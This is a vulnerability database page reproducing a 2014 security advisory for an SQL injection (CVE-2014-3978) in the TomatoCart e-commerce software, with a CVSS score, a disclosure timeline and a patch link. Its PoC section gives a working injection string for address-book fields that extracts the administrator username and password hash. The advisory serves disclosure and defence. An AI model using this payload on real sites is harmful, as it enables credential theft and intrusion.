Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackBreaking.TechnologyEXPLOITPACK:49FFEED281A90E4358988C54E3B2F678
HistoryAug 09, 2014 - 12:00 a.m.

TomatoCart 1.x - SQL Injection

2014-08-0900:00:00
Breaking.Technology
9

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

JSON

TomatoCart 1.x - SQL Injection

Title:
    TomatoCart v1.x (latest-stable) Remote SQL Injection Vulnerability

Background:
    TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions. It's distributed under the terms of the GNU General Public License (or "GPL"), free to download and share. The community, including project founders and other developers, are supposed to work together on the platform of TomatoCart, contributing features, technical support and services. The current stable package is TomatoCart V1.1.8.6.1, while the latest development version is version 2.0 Alpha 4.  This exploit affects the "stable" tree.

Timeline:
    06 June 2014   - CVE-2014-3978 assigned
    06 June 2014   - Submitted to vendor
    25 June 2014   - Received inadequate patch from vendor
    26 June 2014   - Suggested patch sent to vendor
    17 July 2014   - Request for update from vendor, no response.
    05 August 2014 - Pull request sent on github for full patch

Status:
    Vendor ignored, see suggested fix below.

Released:
    05 August 2014 - https://breaking.technology/advisories/CVE-2014-3978.txt

Classification:
    SQL Injection

Exploit Complexity:
    Low

Severity:
    High

Description:
    TomatoCart suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection. 

    Required Information:
    * Valid user account

PoC:
    Create a new contact in your address book using the following values. 

    First name: :entry_lastname,
    Last Name : ,(select user_name from toc_administrators order by id asc limit 1),(select user_password from toc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)# 
    
    The new contact will be added to your address book with the admin hash as the contact's street address 

Suggested Action:
    Pull request has been sent to the developers on github. Recommend patching the required to properly encode colon (:)
    https://github.com/tomatocart/TomatoCart-v1/pull/238

Related

seebug 1
prion 1
cve 1
zdt 1
dsquare 1
exploitdb 1
packetstorm 1
securityvulns 2
openvas 1
seebug
seebug
TomatoCart 1.x - SQL Injection Vulnerability
2014-08-20 00:00:00
prion
prion
Sql injection
2014-10-20 16:55:00
cve
cve
CVE-2014-3978
2014-10-20 16:55:00
zdt
zdt
TomatoCart 1.x - SQL Injection Vulnerability
2014-08-14 00:00:00
dsquare
dsquare
TomatoCart 1.1.8 SQL Injection
2014-09-20 00:00:00
exploitdb
exploitdb
TomatoCart 1.x - SQL Injection
2014-08-09 00:00:00
packetstorm
packetstorm
TomatoCart 1.x Cross Site Scripting / SQL Injection
2014-08-06 00:00:00
securityvulns
securityvulns
TomatoCart v1.x (latest-stable) Multiple Vulnerabilities
2014-08-26 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2014-08-26 00:00:00
openvas
openvas
TomatoCart SQL Injection and Cross Site Scripting Vulnerabilities
2014-10-28 00:00:00

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

JSON
Related for EXPLOITPACK:49FFEED281A90E4358988C54E3B2F678
seebug1prion1cve1zdt1dsquare1exploitdb1packetstorm1securityvulns2openvas1